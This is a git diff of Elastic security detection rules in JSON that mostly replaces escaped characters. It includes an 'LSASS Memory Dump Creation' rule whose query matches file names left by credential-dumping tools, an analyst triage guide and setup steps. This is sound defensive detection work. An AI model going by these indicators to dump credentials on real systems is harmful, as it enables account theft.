If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_103.json b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_103.json index 6db41d0376c..fb4ed55f21c 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_103.json 
@@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_104.json b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_104.json index 2ea0b4b2f35..69743719c8d 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_105.json b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_105.json index 613e5ee7dea..1e59fa2e7d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_105.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_103.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_103.json index 765420ada35..0dd203f4bc1 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_103.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. 
It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the 
existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\", \"?:\\\\Windows\\\\System32\\\\dllhost.exe\") and\n file.path : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\")) and\n\n not (process.executable : \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\")\n", "references": [ "https://github.com/outflanknl/Dumpert", @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", 
@@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_104.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_104.json index dff76f9bd6c..f64eb0efcfb 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_104.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\", \"?:\\\\Windows\\\\System32\\\\dllhost.exe\") and\n file.path : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\")) and\n\n not (process.executable : \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\")\n", "references": [ "https://github.com/outflanknl/Dumpert", @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", 
@@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_105.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_105.json index 2c9d80546d3..36dc32c957f 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_105.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM 